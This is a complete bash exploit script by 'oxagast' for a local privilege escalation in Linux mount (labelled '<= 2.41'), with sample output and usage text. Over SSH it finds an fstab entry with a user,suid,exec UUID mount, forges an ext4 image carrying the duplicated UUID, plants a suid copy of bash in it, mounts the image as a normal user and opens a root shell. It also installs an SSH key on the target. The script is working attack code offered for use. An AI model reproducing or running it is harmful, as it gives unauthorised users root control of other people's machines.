#!/bin/bash # # oxagast # marshall@oxasploits.com # # A Universally Ubiquitous ID plus an evil filesystem swap: # A case study demonstrated in mount. # # sudo ./mount-under-2.42-0day-sploit.sh -u charlie -h 10.0.1.2 -k /home/attacker/.ssh/id_ed25519 # mount <= 2.41 exploit by oxagast # # [?] Checking for vulnerabilty... # [!] Good, looks like the victim is vulnerable! # [*] 10MB file gen... # [*] Created mountpoint... # [*] Created filesystem with UUID 116bf815-c476-4a78-a384-0169e828dcc5 # [*] Grabbing remote copy of /usr/bin/bash to use as payload on victim... # [*] Payload copied to evil fs... permissions updated... # [*] Hey bby, why don't you come on over here and mount this... # [*] Mounted evil fs on 10.0.1.2... # [!] Spawning shell... # whoami # root # # usage() { echo "Linux mount <= 2.41 exploit by oxagast" echo echo "Usage: $0 -h 10.0.1.2 -u charlie" echo echo "For the HOST to be vulnerable it needs to have an /etc/fstab entry that" echo "uses a UUID to refer to the device, as well as having mount options" echo "equivilent to 'user,suid,exec'. Access to the vulnerable host via" echo "ssh is also a requirement, though this was for ease of writing the" echo "exploit and not a true requirement for this to work." echo "A ext4 filesystem is created on a 10mb file with a UUID that is a duplicate" echo "of another UUID listed in /etc/fstab where user,suid,exec are required" echo "options (weather they are explicityly stated or implied), then" echo "/bin/bash is copied to the fs, where it's permissions are subsequently" echo "modified to include the suid bit set, the fs is dismounted and the resulting" echo "file is uploaded to the vuln box, where the file's filesystem with" echo "the cloned UUID is mounted in place of it's cloned UUID brother." echo "Mount doesn't check if the mount already exists as something else" echo "before letting you double up on the same mount point, and because user is" echo "specified, we can mount that fs as a user other than root," echo "but still be able to execute the copy of bash sitting on the evil" echo "filesystem we created. This respects the suid bit setting because of fstab" echo "and executes the file as root, where a shell is waiting for us." exit 1 } EK="exploit.key" PORT="22" while getopts ":h:u:p:k:" OP; do case "${OP}" in u) USERNAME=${OPTARG} ;; h) HOST=${OPTARG} ;; p) PORT=${OPTARG} ;; k) EK=${OPTARG} ;; *) usage ;; esac done shift $((OPTIND - 1)) if [ -z "${HOST}" ] || [ -z "${USERNAME}" ]; then usage exit 1 fi echo "mount <= 2.41 exploit by oxagast" echo if [[ $(id -u) != 0 ]]; then echo "[x] You need to run this locally as root!" exit 1 fi rm -f exploit.key exploit.key.pub if [[ $EK == "exploit.key" ]]; then echo "[*] Generating key..." ssh-keygen -f exploit.key -N "" >/dev/null echo "[*] Copying key..." echo "[?] Private key not specified, please enter SSH password..." ssh-copy-id -i exploit.key.pub -f ${USERNAME}@${HOST} 2>/dev/null >/dev/null fi echo "[?] Checking for vulnerabilty..." if [[ $( ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} true >/dev/null echo $? ) != 0 ]]; then echo "[x] Shit, Doesn't look like we have SSH access!" exit 1 fi VUUID=$(ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep user | grep suid | grep exec | grep UUID | cut -d '=' -f 2 | cut -d ' ' -f 1) if [[ ${VUUID} != "" ]]; then if [[ $(ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | grep "nosuid\|noexec" | wc -l) > 0 ]]; then echo "[x] Drats, not vulnerable! nosuid or noexec present!" echo "[x] Enteries in /etc/fstab are:" ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#' exit 1 fi fi if [[ ${VUUID} == "" ]]; then echo "[x] Fuck, its not vulnerable! Missing correct mount options or UUID reference." echo "[x] Enteries in /etc/fstab are:" ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#' exit 1 fi echo "[!] Good, looks like the victim is vulnerable!" MDIR=$(ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | cut -d ' ' -f 2) fallocate -l 10M exploit echo "[*] 10MB file gen..." mkdir -p expdir echo "[*] Created mountpoint..." yes | mkfs.ext4 exploit -U ${VUUID} -L exploit 2>/dev/null >/dev/null echo "[*] Created filesystem with UUID ${VUUID}" mount exploit expdir/ if ! test -f "./payload"; then echo "[*] Grabbing remote copy of /usr/bin/bash to use as payload on victim..." scp -q -P ${PORT} -i ${EK} ${USERNAME}@${HOST}:/usr/bin/bash payload fi cp ./payload expdir/bash chmod a+s expdir/bash echo "[*] Payload copied to evil fs... permissions updated..." sync umount expdir echo "[*] Hey bby, why don't you come on over here and mount this..." scp -q -P ${PORT} -i ${EK} exploit ${USERNAME}@${HOST}: ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} mount exploit echo "[*] Mounted evil fs on ${HOST}..." echo "[!] Spawning shell..." sleep 1 echo "whoami" WHO=$(ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p -c whoami) echo ${WHO} if [[ ${WHO} -eq "root" ]]; then ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p # boom else echo "[x] Oof. Exploit failed! Sorry!" fi ssh -p ${PORT} -i ${EK} ${USERNAME}@${HOST} umount ${MDIR} echo "[*] Cleaning up local files..." rm -rf exploit expdir rm -f exploit.key exploit.key.pub payload